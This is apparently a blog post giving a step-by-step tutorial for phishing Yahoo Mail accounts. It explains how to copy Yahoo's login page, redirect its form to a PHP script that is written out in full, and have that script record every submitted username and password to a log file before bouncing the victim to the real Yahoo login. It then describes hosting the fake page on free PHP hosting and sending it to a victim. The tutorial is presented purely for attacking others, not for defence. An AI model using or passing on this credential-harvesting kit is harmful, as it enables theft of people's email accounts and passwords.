Hello
friend i hope you all are fine . today i will going to show you how can
hack a yahoo email. and today i using phishing method for hack this. in
this tustorial of phishing in which we will cover how to hack yahoo
passowrd.
in this following tutorail to phishing i will demonstrate how to phish mail.yahoo.com to hack yahoo account of victiom . so as every other on phishing we start it by creating fake login page.
If any one don't know what is phishing then just read myPrevious Article about phishing
To
create fake login page open mail.yahoo.com from your own web browser
and then save it on your desktop as "web page, complete " with name
yahoomail. after above process you will have a file name yahoomail.htm
and a folder name yahoomail.files in folder in which you'll save web
page.
Now open yahoomail.htm in ur notepad and find for action word and locate following string
action= "https://login.yahoo.com/config/login?"
Once located change action string by phish.php, so that above string should appear as following,
action="phish.php"
STEP 2 : To create phish.php file. Open notepad and type following code in it,
<?php
header ('Location: https://login.yahoo.com/config/login_verify2?&.src=ym ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save
it as phish.php, now create an empty password log file log.txt. Now
sign up for a free webhosting service which supports php from http://www.100best-free-web-space.com/.
Now upload Yahoomail.htm file, php file, password log file and
Yahoomail_files folder to that web host. Change permission of log.txt
file to777 from settings. Now vector this phished site to victim to get
his/her password.
No comments:
Post a Comment